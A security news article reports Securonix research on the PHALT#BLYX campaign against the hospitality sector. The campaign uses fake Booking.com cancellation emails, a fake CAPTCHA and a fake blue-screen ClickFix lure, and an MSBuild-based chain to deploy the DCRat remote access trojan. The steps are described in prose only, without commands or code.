Malware Campaign Abuses Booking.com Against Hospitality Sector
None
<p>An evolving multi-stage campaign likely run by Russian threat actors that uses a fake Booking.com reservation cancellation message for initial access is targeting the hospitality industry during the busy holiday season.</p><p>According to a <a href="https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/" target="_blank" rel="noopener">January 5 report from Securonix</a>, the attackers employ a <a href="https://securityboulevard.com/2025/11/attackers-are-using-fake-windows-updates-in-clickfix-scams/" target="_blank" rel="noopener">ClickFix social engineering technique</a> that includes a fake CAPTCHA and fake Blue Screen of Death (BSOD) as well as several other steps before deploying a custom <a href="https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government" target="_blank" rel="noopener">DCRat remote access trojan</a> payload that can give the bad actors remote access to the victim’s system and deploy secondary payloads, according to security researchers with Securonix.</p><p>“Threat actors are targeting hospitality sectors during one of the busiest times of the year, this year’s holiday season,” researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee wrote. “The attackers utilize booking.com, a theme that has been abused in the past and remains a persistent threat. The phishing emails notably feature room charge details in Euros, suggesting the campaign is actively targeting European organizations. The use of the Russian language within the ‘v.project’ [MSBuild] file links this activity to Russian threat factors using DCRat.”</p><p>They wrote that they traced back the activity in the PHALT#BLYX campaign several months, seeing a “notable evolution” in the infection chain. Earlier samples relied on a delivery mechanism that was less sophisticated, using HTML Application – or .hta – files and the legitimate “mshta.exe” utility to deploy remote payloads through embedded URLs. The method was effective but easily detected.</p><p>“The `.hta` and associated PowerShell scripts contained straightforward execution logic, typically a direct path to the RAT, which made them easy targets for antivirus vendors and automated security controls,” Sangwan, Gaikwad, and Beardslee wrote. “The shift to the current MSBuild-based chain represents a strategic pivot towards more evasive, ‘Living off the Land’ techniques to bypass these defenses.”</p><h3>Starts With Fake Booking.com Message</h3><p>The phishing message delivered in the campaign is made to look like a reservation cancellation from Booking.com, and the user is redirected to a fake page showing a CAPTCHA-style browser error. The phishing email shows a significant financial charge that the bad actors hope creates a sense of urgency in the victim to immediately investigate the problem. Clicking on the “see details” button to verify the charge sends the user through a redirector to the malicious domain.</p><p>The landing page is made to look like a legitimate Booking.com interface – it includes the right colors, logos, and font styles – but comes with a message that reads “loading is taking too long” and a “refresh page” button.</p><p>“The fake error exploits this urgency, prompting them to click the ‘Refresh’ button without second-guessing its legitimacy,” the researchers wrote. “This click is the critical pivot point where the user transitions from a passive observer to an active participant in the compromise.”</p><p>The landing page is difficult for defenders to detect and is still live and accessible. It can bypass most web filters.</p><h3>Enter Blue Screen of Death</h3><p>Once the “refresh” button is clicked on, a fraudulent Blue Screen of Death animation pops up, ramping up the urgency and worry. Targets are informed that they can fix the problem by pasting a malicious script into the Windows Run dialog.</p><p>The malicious script executes a PowerShell command that downloads v.proj, the MSBuild project file, while the MSBuild.exe pulls together and runs the embedded payload that’s held within v.proj, the researchers wrote. The malware also disables Windows Defender to evade detection and establishes persistence through a “.url” file in the system’s Startup folder.</p><p>The DCRat is then executed, creating a connection to the command-and-control (C2) server and injecting a secondary payload in “aspnet_compiler.exe.” The DCRat payload allows for full remote control of targeted systems, enabling the attackers to run keylogging and command execution and drop other malware. It also injects malicious code into Windows processes to hide its activity.</p><h3>‘Sophisticated Evolution’</h3><p>“The PHALT#BLYX campaign represents a sophisticated evolution in commodity malware delivery, seamlessly blending high-pressure social engineering with advanced ‘Living off the Land’ techniques,” Sangwan, Gaikwad and Beardslee wrote. “The psychological manipulation, combined with the abuse of trusted system binaries like `MSBuild.exe,’ allows the infection to establish a foothold deep within the victim’s system before traditional defenses can react. The technical complexity of the infection chain reveals a clear intent to evade detection and maintain long-term persistence.”</p><p>They added that while abusing the Booking.com brand is a known tactic, bad actors traditionally compromised hotel accounts to message guests directly or to send phishing emails to hotel owners via fake inquiries. They also relied on direct malware links contained in the emails that led to file-sharing sites hosting such infostealer malware like <a href="https://securityboulevard.com/2024/06/exposing-the-cc-and-ioc-infrastructure-of-the-redline-stealer-malicious-software-an-analysis/" target="_blank" rel="noopener">RedLine</a>, <a href="https://securityboulevard.com/2024/06/stealc-vidar-malware-campaign-identified/" target="_blank" rel="noopener">Vidar</a>, or <a href="https://www.justice.gov/usao-wdtx/pr/us-joins-international-action-against-redline-and-meta-infostealers" target="_blank" rel="noopener">Meta Stealer</a>.</p><p>“While PHALT#BLYX shares the same target (hospitality) and attribution markers (Russian Threat actors), it represents a significant tactical shift in the delivery and trigger,” the researchers wrote.</p><h3>Likely a Russian Actor</h3><p>In addition, while the campaign – the tools and language suggest a Russian threat actor – right now is targeting the hospitality industry, it could be adapted for other sectors.</p><p>“As these tactics continue to evolve, organizations must look beyond file-based detection and focus on behavioral anomalies and process lineage to identify and stop these multi-staged attacks,” the researchers wrote.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/01/malware-campaign-abuses-booking-com-against-hospitality-sector/" data-a2a-title="Malware Campaign Abuses Booking.com Against Hospitality Sector"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F01%2Fmalware-campaign-abuses-booking-com-against-hospitality-sector%2F&linkname=Malware%20Campaign%20Abuses%20Booking.com%20Against%20Hospitality%20Sector" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F01%2Fmalware-campaign-abuses-booking-com-against-hospitality-sector%2F&linkname=Malware%20Campaign%20Abuses%20Booking.com%20Against%20Hospitality%20Sector" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F01%2Fmalware-campaign-abuses-booking-com-against-hospitality-sector%2F&linkname=Malware%20Campaign%20Abuses%20Booking.com%20Against%20Hospitality%20Sector" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F01%2Fmalware-campaign-abuses-booking-com-against-hospitality-sector%2F&linkname=Malware%20Campaign%20Abuses%20Booking.com%20Against%20Hospitality%20Sector" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F01%2Fmalware-campaign-abuses-booking-com-against-hospitality-sector%2F&linkname=Malware%20Campaign%20Abuses%20Booking.com%20Against%20Hospitality%20Sector" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>